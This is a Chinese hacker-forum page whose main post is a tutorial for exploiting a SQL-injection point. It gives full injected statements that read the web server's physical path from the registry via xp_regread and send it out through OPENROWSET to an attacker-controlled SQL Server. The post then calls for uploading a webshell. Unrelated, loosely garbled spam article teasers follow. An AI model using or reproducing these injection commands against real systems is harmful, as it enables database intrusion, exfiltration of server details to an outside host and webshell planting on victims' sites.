黑客监控联系-微信上的黑客联盟公共号(黑客联盟论坛微信

访客3年前黑客工具418

渗透中用openrowset搞shell的 ***
得到SQL注入点,首先想到的是BACKUPWEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库

然后在对方机器上建立个表createtable[dbo].[fenggou]([cha8][char](255))--

在对方执行DECLARE@resultvarchar(255)execmaster.dbo.xp_regread'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\VirtualRoots','/',@resultoutputinsertintofenggou(cha8)values('selecta.*FROMOPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'',''select*FROMpubs.dbo.authorswhereau_fname='''''+@result+''''''')ASa');--

这样fenggou这个表里就会有这样一条记录selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa

不用说,''D:\WEB就是从注册表里读出的物理路径拉.然后执行DECLARE@a1char(255)set@a1=(selectcha8FROMfenggou)exec(@a1);--

等于执行了selecta.*FROMOPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码','select*FROMpubs.dbo.authorswhereau_fname=''D:\WEB,,1''')ASa

OK,这时你在你机器上SQL事件追踪器上就会显示select*FROMpubs.dbo.authorswhereau_fname='D:\WEB,,1'
哇哈哈哈哈哈物理路径到手了写小马传大马吧~

相关文章

黑客英雄点击器(黑客英雄点击器破解版)

黑客英雄点击器(黑客英雄点击器破解版)

本文目录一览: 1、冒险岛必练12个link是什么? 2、最近的完本小说,书虫来~ 3、谁能推荐下好玩点的单机游戏~~ 4、男孩是黑客,为了一个女孩去盗女孩学校的试卷 5、"全球最牛"...

湖南国税网上申报大厅(零报税网上申报流程)

 新作用,新作用 ,江苏省网上税务局会见您了!   做为一个好的税收合作伙伴和助理,   必须让大伙儿在第一时间获得详尽的实际操作方式   赶快收起來~ ~   一个   降落详细地址  ...

加湿器的正确使用方法湿度保持(安装使用步骤有哪些)

  天气干燥的情况下,应用空气加湿器能让日常生活的自然环境更加舒服一些。那麼,空气加湿器的应用流程是啥?下面,晓听PChouse细细地来说。   1、加储水箱   空气加湿器会有一个小储水箱,用于盛水...

怎么把店铺推广出去(新店死店都适用的推广方案)

  您的店铺不管做得怎样极致,产品再价廉物美。如果不将它营销推广起来,提升它的名气,那麼,这一网上商城只有说成做为自己看的,它存在的价值就大幅稍逊了。可怎么推广,怎样提高自己网址的浏览量,而且可以吸引...

win10如何更新到win10x,win10系统更新升级win10x方法

win10如何更新到win10x呢,话说许多客户都是在资询这个问题呢?下边就来我这儿看下win10系统升级升級win10x的文图操作流程吧,必须的盆友能够参照下哦。       win10如何更新到w...

孤独的黑客英文(黑暗中的孤独者的英文)

孤独的黑客英文(黑暗中的孤独者的英文)

本文目录一览: 1、骇客与黑客的区别 2、黑客是什么 3、“黑客”是什么?为什么叫“黑客”? 4、黑客和骇客的意思是什么? 骇客与黑客的区别 一、骇客与黑客的关系1、骇客具有与黑客同样的...